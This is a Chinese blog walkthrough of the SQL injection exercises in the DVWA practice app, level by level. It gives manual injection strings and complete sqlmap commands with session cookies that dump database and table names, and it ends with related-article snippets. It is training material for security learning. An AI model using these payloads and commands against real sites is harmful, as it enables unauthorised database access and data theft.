DVWA--SQLInjection

最新推荐文章于 2023-08-10 16:56:49 发布
最新推荐文章于 2023-08-10 16:56:49 发布
阅读量185 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45038413/article/details/90044405
版权

Low 等级

1.手工方法

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

注入poc为:1’ or ‘1’=’1

确定查询字段数

在这里插入图片描述在这里插入图片描述
确定回显点
在这里插入图片描述
数据库名为dvwa
在这里插入图片描述
表名为guestbook,users
在这里插入图片描述
2.使用sqlmap进行注入
python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=low"
注入类型
在这里插入图片描述
数据库名
python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=low" --current-db
在这里插入图片描述
表名

python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=low"  -D dvwa --tables

在这里插入图片描述

Medium 等级

请求方式变为post
在这里插入图片描述
确定注入poc

在这里插入图片描述

报错
在这里插入图片描述
查看源码,发现使用mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
(受影响字符:\x00,\n,\r,\,’,",\x1a)
在这里插入图片描述
1.对dvwa进行hex编码,获得表名

在这里插入图片描述
2.使用(select database())代替’dvwa’
在这里插入图片描述
3.使用sqlmap获取表名

  python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli/" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=medium" -D dvwa --tables

在这里插入图片描述

High 等级

1.手工方法
确定注入poc

在这里插入图片描述在这里插入图片描述
2.使用sqlmap

python sqlmap.py -u "https://dvwa.practice.rois.io/vulnerabilities/sqli/session-input.php" --data "id=1&Submit=Submit" -p "id" --cookie "PHPSESSID=pqsnp4fk48uek23a6qs5k47gt2; security=high" --second-url "https://dvwa.practice.rois.io/vulnerabilities/sqli/" -D dvwa --tables在这里插入图片描述

Impossible 等级

检测了id数据类型,使用了预编译绑定id变量,并参数化SQL语句,
有效防止了SQL注入
同时只有查询返回结果数量是1时才显示结果,有效防范了脱库

在这里插入图片描述

Vr.ka
关注
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 392
SQL-Injectionlow等级首先我们将dvwa等级调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
Web安全 学习日记3 - DVWA 普通手工SQL注入
qq_46081990的博客
03-10 421
查看前端代码:发现是一个form表单,有id和submit两个参数,并且以GET方式提交。 查看后端PHP代码:将结果集中first_name和last_name字段的值分别赋值给变量first和变量first和变量first和变量last,并打印输出。 输入单引号查询,页面报错,判断存在SQL注入。 如何判断是字符型还是数值型的方法,参考此链接:sql注入_字符型、数字型判断输入1查询出的用户为admin,输入1+2查询出的用户还是admin,判断是字符型SQL注入。 或者 输入1 and 1=2 页面
使用SQLmap进行注入流程
最新发布
weixin_62715196的博客
08-10 3279
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
【网络安全 | 渗透工具】SQLmap加密注入教程+实战详析
等风来
08-02 6192
在使用手工注入绕过参数加密的限制时,需要构造出原始POC再进行加密注入,耗时耗力,因此采用sqlmap加密注入。表示只对该参数进行注入测试,不加 * 的话还会测试其他参数是否为注入点,增加时间。选择默认选项,跑sqlmap的时候加上这句话可节约时间、不需要回复提示
注入&Sqlmap
DebbieLi_Ca的博客
10-25 632
中心主题 sqlmap SQLMap介绍 1.Sqlmap介绍 2.Sqlmap环境安装 3.sqlmap下载 sqlmaap版本查看 sqlmap获取目标 1.sqlmap直连数据库 -d表示直连 –banner 获取banner信息 2.sqlmap URL探测 3.sqlmap文件读取目标 可以探测多个URL 4.sqlmap google批量注入 sqlmap请求参数设置 Sqlmap设置HTTP方法 get和put POST在请求的时候,服
DVWA--SQL Injection(SQL注入-非盲注)(全难度)
wwxxee
03-03 390
DVWASQL Injection(SQL 注入)非盲注 原理参考:网络安全笔记-99-渗透-SQL注入 逻辑 输入id查询用户名。 难度分级 Low 单引号闭合,且有报错提示。 核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_n
DVWA--SQL Injection(Blind)(SQL盲注)(全难度)
wwxxee
03-03 268
DVWASQL Injection (Blind)(SQL盲注) 原理参考:网络安全笔记-99-渗透-SQL注入 逻辑 输入框输入ID,然后判断该ID是否存在 难度分级 Low 核心代码 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM u
DVWA - SQL Injection (medium)
qq_42630215的博客
05-28 289
medium级别(手工注入 和 sqlmap工具注入) 手工注入 因为该级别设置了下拉菜单,提交后URL中没有显示ID,提交方式为POST,所以用burpsuite抓包,更改参数。 1.判断是否存在注入,注入的类型是字符型还是数字型 id=1&Submit=Submit id=1’ &Submit=Submit id=1 and 1=1&Submit=Submit id=1 and 1=2&Submit=Submit 2.猜测字段数 3.确定显示的字段顺序 4.获取当
DVWA--SQL注入(SQL Injection)--Medium
JakeLin's Blog
06-16 868
DVWA--SQL注入(SQL Injection)--Low 目录 级别:Medium 1、查看POST请求 2、hackbar提交POST请求 3、输入',报错,判断为数字型注入 4、猜测SQL查询的字段数 5、确定回显的位置 6、获取当前数据库及版本信息 7、获取数据库中表信息(group_concat()) 8、获取表字段 9、获取用户信息 10、密文解码 后台源码 级别:Medium Medium级别的代码利用mysql_real_escape_string函数对特.
DVWA-master.zip
08-22
DVWA中,"SQL Injection"模块将让你体验如何利用这类漏洞。 2. **XSS(Cross Site Scripting)跨站脚本**:XSS攻击是通过在网页中插入恶意脚本,使用户在不知情的情况下执行这些脚本,从而盗取用户的敏感信息。...
Sqlmap基础用法
wang720521的博客
01-28 4415
SQLmap 用法 用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库
sqlmap基础使用手册 ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 >web安全<
寻觅的博客
03-03 2268
文章目录sqlmap简介sqlmap特性sqlmap下载安装与启动sqlmap基础使用 sqlmap简介 顾名思义,sqlmap是一个自动化sql注入的开源的渗透工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。他有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。官方网址 如果...
sqlmap详细的参数功能介绍(全面)
weixin_46709219的博客
11-13 5716
目录 介绍 命令参数 指定目标 直连数据库 服务型数据库(前提知道数据库用户名和密码) 文件型数据库(前提知道数据库绝对路径) URL探测 文件读取目标 Google dork注入 Http参数 设置请求方法 POST提交参数 设置参数分隔符 设置Cookie 设置User-Agent Host Referer 额外的HTTP头部 协议认证 设置代理 Tor匿名网络 设置...
网络安全-sqlmap学习笔记
关注网络安全、云原生安全
06-08 6680
介绍 检测和利用SQL注入的工具。 命令参数 参数解释 参数 含义 描述 -h,--help 帮助 显示基本帮助消息并退出 -hh 高级帮助 显示高级帮助消息并退出 --version 版本 显示程序的版本号并退出 -u,-url=URL URL 目标URL(例如“ http://www.site.com/vuln.php?id=1”) -d DIRECT 连接字符串,用于数据库直接连接 -l .
渗透常用工具-SQLMap
beirry的博客
05-08 1236
sqlmap 是用python编写的渗透测试工具,可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。通常检测到存在sql注入点时,就可以利用此工具来进行验证。 下载使用 SQLMap下载地址:https://sqlmap.org/#download Python下载地址:https://www.python.org/downloads/ 根据以上下载地址来获取安装包 SQLmap: Python: 下载完后安装即可使用。 使用方法 打开sqlmap所在目录,打开命令行。 在命令行中输入pyt
dvwa-sql注入high级别sqlmap使用(自制任务)
weixin_47726676的博客
05-08 861
在high安全级别下,我们能够看到进行了一次页面跳转 使用cookie插件获取cookie信息 --cookie="4a80203698ca9007ed3373a065349ddd;security=high" 此时用户提交网站为10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" 实际要注入的网站为http://10.1
使用dvwa进行SQL注入的练习
热门推荐
不忘初心,护天下安全!
01-01 1万+
SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多就是...
URL 和 URI 区别
neweastsun的专栏
07-15 1万+
URL 和 URI 区别 本文我们讨论URL 和 URI 的主要区别,并通过示例说明这些差异。 URL 和 URI 直接差异来自其定义: Uniform Resource Identifier (URI) − 对任何抽象或物理资源进行完整标识的字符序列。 Uniform Resource Locator (URL) − 除了标识资源可用的位置之外,URI的一个子集描述了访问该资源的主...
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值